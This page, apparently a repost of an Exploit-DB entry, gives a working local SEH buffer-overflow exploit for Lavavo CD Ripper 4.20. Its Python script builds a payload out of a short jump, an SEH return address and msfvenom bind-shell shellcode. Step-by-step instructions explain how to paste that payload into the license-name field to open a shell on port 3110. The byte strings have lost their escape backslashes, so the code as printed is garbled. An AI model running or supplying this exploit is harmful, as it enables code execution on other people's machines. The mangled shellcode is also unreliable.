Lavavo CD Ripper 4.20 – ‘License Activation Name’ Buffer Overflow (SEH) – Digitalmunition




Exploit/Advisories spider-orange.png

Published on April 28th, 2019 📆 | 3685 Views ⚑

0

Lavavo CD Ripper 4.20 – ‘License Activation Name’ Buffer Overflow (SEH)

# Exploit Title: Lavavo CD Ripper 4.20 Local Seh Exploit
# Date: 25.04.2019
# Vendor Homepage:https://www.lavavosoftware.com
# Software Link:  https://lavavo-cd-ripper.jaleco.com/download
# Exploit Author: Achilles
# Tested Version: 4.20
# Tested on: Windows XP SP3 EN
#            Windows 7 Sp1 x64

# 1.- Run python code : Lavavo.py
# 2.- Open EVIL.txt and copy content to Clipboard
# 3.- Open LavavoCDRipper.exe and click UNLOCK.
# 4.- Paste the Content of EVIL.txt into the 'License Activation Name'
# 5.- License Key 123456789
# 6.- Click 'Unlock Now' and you will have a bind shell port 3110.

#!/usr/bin/env python
import struct

buffer = "x41" * 300
nseh = "xebx06x90x90" #jmp short 6
seh  =  struct.pack('<l ',0x1003157d) #libsndfile.dll
nops =  "x90" * 20

#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=3110 -e x86/shikata_ga_nai -b "x00x0ax0d" -i 1 -f python
#badchars "x00x0ax0d"
shellcode = ("xb8xf4xc0x2axd0xdbxd8xd9x74x24xf4x5ax2b" 
"xc9xb1x53x31x42x12x83xeaxfcx03xb6xcexc8"
"x25xcax27x8exc6x32xb8xefx4fxd7x89x2fx2b"
"x9cxbax9fx3fxf0x36x6bx6dxe0xcdx19xbax07"
"x65x97x9cx26x76x84xddx29xf4xd7x31x89xc5"
"x17x44xc8x02x45xa5x98xdbx01x18x0cx6fx5f"
"xa1xa7x23x71xa1x54xf3x70x80xcbx8fx2ax02"
"xeax5cx47x0bxf4x81x62xc5x8fx72x18xd4x59"
"x4bxe1x7bxa4x63x10x85xe1x44xcbxf0x1bxb7"
"x76x03xd8xc5xacx86xfax6ex26x30x26x8exeb"
"xa7xadx9cx40xa3xe9x80x57x60x82xbdxdcx87"
"x44x34xa6xa3x40x1cx7cxcdxd1xf8xd3xf2x01"
"xa3x8cx56x4ax4exd8xeax11x07x2dxc7xa9xd7"
"x39x50xdaxe5xe6xcax74x46x6exd5x83xa9x45"
"xa1x1bx54x66xd2x32x93x32x82x2cx32x3bx49"
"xacxbbxeexe4xa4x1ax41x1bx49xdcx31x9bxe1"
"xb5x5bx14xdexa6x63xfex77x4ex9ex01x7bxa9"
"x17xe7xe9xa5x71xbfx85x07xa6x08x32x77x8c"
"x20xd4x30xc6xf7xdbxc0xccx5fx4bx4bx03x64"
"x6ax4cx0exccxfbxdbxc4x9dx4ex7dxd8xb7x38"
"x1ex4bx5cxb8x69x70xcbxefx3ex46x02x65xd3"
"xf1xbcx9bx2ex67x86x1fxf5x54x09x9ex78xe0"
"x2dxb0x44xe9x69xe4x18xbcx27x52xdfx16x86"
"x0cx89xc5x40xd8x4cx26x53x9ex50x63x25x7e"
"xe0xdax70x81xcdx8ax74xfax33x2bx7axd1xf7"
"x5bx31x7bx51xf4x9cxeexe3x99x1exc5x20xa4"
"x9cxefxd8x53xbcx9axddx18x7ax77xacx31xef"
"x77x03x31x3a")
pad ="C" * (6000 - len(buffer) - len(nseh+seh) - len(nops) -len(shellcode))
payload = buffer + nseh + seh + nops + shellcode + pad

try:
	f=open("Evil.txt","w")
	print "[+] Creating %s bytes evil payload.." %len(payload)
	f.write(payload)
	f.close()
	print "[+] File created!"
except:
	print "File cannot be created"
            

https://www.exploit-db.com/exploits/46755

Tagged with:



Leave a Reply

Your email address will not be published. Required fields are marked *


loading...